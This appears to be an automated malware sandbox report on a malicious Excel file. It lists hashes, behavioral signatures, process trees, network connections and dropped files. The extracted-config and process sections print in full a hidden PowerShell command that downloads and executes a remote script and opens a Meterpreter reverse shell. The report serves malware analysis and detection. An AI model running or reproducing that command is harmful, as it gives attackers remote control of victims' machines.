Overview

overview

10

Static

static

8

f329e4b08a...55.xls

windows7-x64

10

f329e4b08a...55.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    19s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    08/07/2024, 21:57 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55.xls

  • Size

    35KB

  • MD5

    37c6ff0b9bc51d0fcb452256f18a598b

  • SHA1

    53eb945d5f264f9bce3ec8da311544d3aa6d3f4d

  • SHA256

    f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55

  • SHA512

    6c21282c8a5052703299122cd25f03ba1ffccbbdcfe670ae68f001953e246695b1685a37669061a1eb7cd8893776da04f963a1592a4fdbca1e514601ef42a632

  • SSDEEP

    768:Ftvo+/zZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ9QCv/1f93:t1k3hbdlylKsgqopeJBWhZFGkE+cL2NO

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
1
IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55.xls
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\config.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2384
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3000

Network

  • flag-us
    DNS
    raw.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
     219 B
     5
    5
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
     219 B
     5
    5
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
     219 B
     5
    5
  • 185.199.111.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
     219 B
     5
    5
  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    powershell.exe
    71 B
     135 B
     1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.111.133
    185.199.108.133
    185.199.109.133
    185.199.110.133

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q3C17KOP9SF5JUIRLDIT.temp
    Filesize

    7KB

    MD5

    87ad9165900c1699cd0a201fe192ff59

    SHA1

    e3325d8d32baa8c250a43c8110a62e6dd91a2e1c

    SHA256

    8f3bc412af2b605c78cb1126318d831e2975de9ae1211df9f1b8dcf02067dc34

    SHA512

    330fb8bcc2d8d0af4880330023f0ebf970866353d91e59f0ea355ace0add9b98a03a3a247c5252b2fc68e6b6a504be793d3fc314998fee1a935d916d6f443136

    Download Submit

  • C:\Users\Public\config.vbs
    Filesize

    461B

    MD5

    ce52ab154163c511f0efa6a61e22ab64

    SHA1

    9f12cc215e15802eddcb02cb5370ef16b21fa3a6

    SHA256

    df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

    SHA512

    cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

    Download Submit

  • memory/2544-39-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2544-18-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2544-37-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2544-38-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2544-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2544-17-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2544-1-0x0000000072C8D000-0x0000000072C98000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2544-49-0x0000000072C8D000-0x0000000072C98000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2544-50-0x0000000006420000-0x0000000006520000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/3000-45-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3000-46-0x00000000022E0000-0x00000000022E8000-memory.dmp

    Filesize

    32KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.